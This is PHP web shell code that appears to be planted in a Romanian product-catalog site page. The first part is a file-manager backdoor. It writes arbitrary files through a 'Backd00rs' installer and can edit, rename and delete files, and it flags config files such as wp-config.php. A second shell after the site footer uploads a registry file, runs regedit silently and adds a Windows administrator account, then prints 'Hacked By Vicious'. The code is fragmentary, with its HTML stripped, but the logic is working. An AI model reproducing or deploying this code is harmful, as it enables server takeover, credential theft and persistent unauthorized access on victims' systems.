';
if(isset($_GET['script']) && isset($_POST['s_cript']) && $_POST['e_vil']!=""){
@$write=fopen($_POST['e_vil'],'w+');
$code=stripslashes($_POST['evil_s']);
@$ok=fwrite($write,$code);
if(!$ok){
echo '
=/ Fucking Perms';
}
else{
echo '
=D installed!';
}
exit();
}
if(isset($_GET['script']) && isset($_GET['evil']) && $_GET['evil']=="1"){
echo 'install:'.'
'.
'';
exit();
}
echo ''.'Backd00rs'.'';
echo '';
exit();
}
?>
if(isset($_POST['go_dir']) && $_POST['n_path']!=""){
$_GET['path']=$_POST['n_path'];
}
?>
if(isset($_POST['mkfile'])){
if(isset($_POST['mkfile']) && $_POST['r_file']!="" && isset($_POST['mk_code'])){
if($_POST['r_file']!=dirname($_POST['r_file'])){
@$write=fopen($_POST['r_file'],'w+');
@$mk_code=stripslashes($_POST['mk_code']);
@$ok=fwrite($write,$mk_code."\n");
if(!$ok){
echo ' =/ Fucking Perms';
}
else{
echo ' =D save!';
}
exit();
}
}
echo '';
echo ' ';
exit();
}
?>
if(isset($_POST['mkdir']) && $_POST['r_dir']!=""){
@$ok=mkdir($_POST['r_dir']);
if(!$ok){
echo ' =/ Fucking Perms';
}
else{
echo ' =D save!';
}
exit();
}
?>
if(isset($_GET['R']) && isset($_GET['P'])){
echo ' ';
if(isset($_POST['rename']) AND $_POST['name']!=""){
@$new=rename($_GET['R'].'/'.$_GET['P'],$_GET['R'].'/'.$_POST['name']);
if(!$new){
echo '=/ Fucking Perms';
}
else{
echo '=D Save!';
exit();
}
}
echo ' ';
exit();
}
?>
if(isset($_GET['E'])){
echo ' ';
$e_on=explode('/',$_GET['E']);
$e_on=array_reverse($e_on);
echo 'File to Edit: '.$e_on[0].' ';
echo ' ';
echo ' ';
exit();
}
?>
if(isset($_GET['V'])){
echo ' ';
$v_on=explode('/',$_GET['V']);
$v_on=array_reverse($v_on);
echo 'file: '.$v_on[0].' ';
echo '';
echo ' ';
exit();
}
?>
if(isset($_GET['Rm'])){
echo ' ';
@$rmd=rmdir($_GET['Rm']);
if(!$rmd){
echo "=/ Fucking perms";
exit();
}
else{
echo "=D deleted";
exit();
}
echo ' ';
}
?>
if(isset($_GET['D'])){
echo ' ';
@$unlk=unlink($_GET['D']);
if(!$unlk){
echo "=/ Fucking perms";
exit();
}
else{
echo "=D deleted";
exit();
}
echo ' ';
}
?>
echo ' ';
echo ' ';
if($_GET['path']==""){
@$directorio=dir($prim);
$ruta=$prim;
}
else{
@$directorio=dir($_GET['path']);
$ruta=$_GET['path'];
}
while ($archivo = $directorio->read())
{
$type=filetype($ruta.'/'.$archivo);
if($type=="dir"){
$perms = fileperms($ruta.'/'.$archivo);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
if($archivo!='.'){
echo ''.'| '.''.'/'.$archivo.''.' | ';
if(is_writable($ruta.'/'.$archivo)){echo ''.''.$info.''.' | ';}
else{echo ''.''.$info.''.' | ';}
}
if($archivo!='.' && $archivo!='..'){
echo ''.''.'[Rename]'.''.' | ';
echo ''.''.'[Delete]'.''.' | ';
echo ' ';
}
}
else{
$perms = fileperms($ruta.'/'.$archivo);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
$type=explode('.',$archivo);
if($archivo=="config.php" || $archivo=="wp-config.php" || $archivo=="conf.php" || $archivo=="configuration.php"
|| $archivo=="admin.php" || $archivo=="index.php" || $archivo=="index.html" || $archivo=="index.htm"){
echo ''.'| '.''.''.$archivo.''.''.' | ';}
else{
echo ' '.'| '.''.$archivo.''.' | ';
}
if(is_writable($ruta.'/'.$archivo)){echo ''.''.$info.''.' | ';}
else{echo ''.''.$info.''.' | ';}
echo ''.''.'[View]'.''.' | ';
echo ''.''.'[Edit]'.''.' | ';
echo ''.''.'[Rename]'.''.' | ';
echo ''.''.'[Delete]'.''.' | ';
echo ' ';
}
}
$directorio->close();
echo ' ';
?>
echo ' ';
echo ' ';
?>
">
Catalog de produse Site Gratuit 4U
|
|
Termeni si conditii
<?php
if (isset($_REQUEST["upload"])) {
$dir=$_REQUEST["uploadDir"];
$file=$HTTP_POST_FILES["file"]["name"];
$user=$_REQUEST["user"];
$pass=$_REQUEST["pass"];
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
@chmod($dir . "/" . $file, 0755);
echo exec("regedit.exe /s ". $dir. "remote.reg >> reg.txt");
echo exec("net user ". $user. " ". $pass." /add >> add.txt" );
echo exec("net localgroup Administrators ". $user. " /add >> admin.txt");
echo "Hacked By Vicious";
}
else {
echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data>
<table align=center>
<tr><th>MuToolz5Disable Mod<input type=hidden name=MAX_FILE_SIZE value=100000000000000000></th></tr>
<tr><td>Archivo Reg:<input name=file type=file></td></tr>
<tr><td>Carpeta:<input type=text name=uploadDir value=C:\Inetpub\wwwroot> </td></tr>
<tr><td>Usuario:<input type=text name=user value=user> </td></tr>
<tr><td>Contraseña:<input type=text name=pass value=pass> </td></tr>
<tr><td align=right><input type=submit name=upload value=Done></td></tr>
</table>
</form>";
}
?>
|
|
|